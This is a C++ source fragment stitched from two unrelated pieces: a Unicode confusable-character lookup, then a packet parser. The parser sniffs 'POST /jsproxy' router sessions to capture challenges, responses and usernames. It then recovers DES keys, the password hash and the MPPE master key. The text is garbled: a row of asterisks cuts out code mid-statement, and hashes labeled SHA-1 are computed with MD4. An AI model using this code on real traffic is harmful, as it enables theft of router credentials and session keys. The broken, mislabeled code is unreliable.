int32_t SpoofData::confusableLookup(UChar32 inChar, UnicodeString &dest) const {
// Perform a binary search.
// [lo, hi), i.e lo is inclusive, hi is exclusive.
// The result after the loop will be in lo.
int32_t lo = 0;
int32_t hi = length();
do {
int32_t mid = (lo + hi) / 2;
if (codePointAt(mid) > inChar) {
hi = mid;
} else if (codePointAt(mid) < inChar) {
lo = mid;
} else {
// Found result. Break early.
lo = mid;
break;
}
} while (hi - lo > 1);
// Did we find an entry? If not, the char maps to itself.
if (codePointAt(lo) != inChar) {
dest.append(inChar);
return 1;
}
// Add the element to the string builder and return.
return appendValueTo(lo, dest);
}
void SessionParser::parse(const boost::uint8_t* p_data, boost::uint16_t p_length, boost::uint32_t p_srcAddr)
{
switch(m_state) {
case k_none:
if (p_length > 13 && memcmp(p_data, "POST /jsproxy", 13) == 0) {
std::cout << "[+] Initial request found." << std::endl;
m_state = k_request;
}
break;
case k_request:
if (p_length > 17 && memcmp(p_data, "HTTP/1.1 200 OK\r\n", 17) == 0) {
std::cout << "[+] Server challenge received." << std::endl;
m_serverAddress = p_srcAddr;
std::string packet;
packet.assign(reinterpret_cast<const char*>(p_data), p_length);
if (moveToPayload(packet) && packet.length() > 32) {
std::size_t index = 0;
for (std::size_t i = 0; i < 24 && index < packet.length(); i++) {
if (i < 8) {
codePointAt(packet, index);
} else {
m_rchallenge.push_back(codePointAt(packet, index));
}
}
}
m_state = k_challenge;
}
break;
case k_challenge:
{
if (p_length < 13 || memcmp(p_data, "POST /jsproxy", 13) != 0) {
break;
}
std::cout << "[+] Challenge response found." << std::endl;
m_state = k_done;
std::string packet;
packet.assign(reinterpret_cast<const char*>(p_data), p_length);
if (!moveToPayload(packet)) {
std::cerr << "Failed to find the payload." << std::endl;
break;
}
std::size_t index = 0;
for (std::size_t i = 0; i < 26; i++) {
codePointAt(packet, index);
}
m_lchallenge.assign(packet.data() + index, 16);
index += 16;
for (std::size_t i = 0; i < 8; i++) {
codePointAt(packet, index);
}
for (std::size_t i = 0; i < 8 && index < packet.length(); i++) {
m_response1.push_back(codePointAt(packet, index));
}
for (std::size_t i = 0; i < 8 && index < packet.length(); i++) {
m_response2.push_back(codePointAt(packet, index));
}
for (std::size_t i = 0; i < 8 && index < packet.length(); i++) {
m_response3.push_back(codePointAt(packet, index));
}
m_response.assign(m_response1);
m_response.append(m_response2);
m_response.append(m_response3);
m_username.assign(packet.data() + index, packet.length() - index);
std::cout << "Username: "******"Failed to recover key3!" << std::endl;
return;
}
std::cout << "DES Key 3: ";
printHexString(key3, true);
// guess des key 2
std::string key2;
if (!getKey2(key2, m_response2, challengeHash)) {
std::cerr << "Failed to recover key2!" << std::endl;
return;
}
std::cout << "DES Key 2: ";
printHexString(key2, true);
// guess des key 1
std::string key1;
if (!getKey1(key1, m_response1, challengeHash)) {
std::cerr << "Failed to recover key1!" << std::endl;
return;
}
std::cout << "DES Key 1: ";
printHexString(key1, true);
// retrieve the pwdhash from our 3 keys
std::string pwdHash(makePwdHash(key1));
pwdHash.append(makePwdHash(key2));
pwdHash.append(makePwdHash(key3));
pwdHash.resize(16);
std::cout << "Password SHA-1: ";
printHexString(pwdHash);
// create the pwd hash hash for master key creation
std::string pwdHashHash(MD4::md4(pwdHash));
std::cout << "SHA-1(Password SHA-1): ";
printHexString(pwdHashHash);
// create the master key
std::string masterKey(pwdHashHash);
masterKey.append(m_response);
masterKey.append("This is the MPPE Master Key");
unsigned char sharesult[20] = { 0 };
sha1::calc(masterKey.data(), masterKey.size(), sharesult);
masterKey.assign((char*)sharesult, 16);
std::cout<< "Master Key: ";
printHexString(masterKey);
}
break;
case k_challenge_response:
case k_decrypt:
case k_done:
default:
break;
}
}
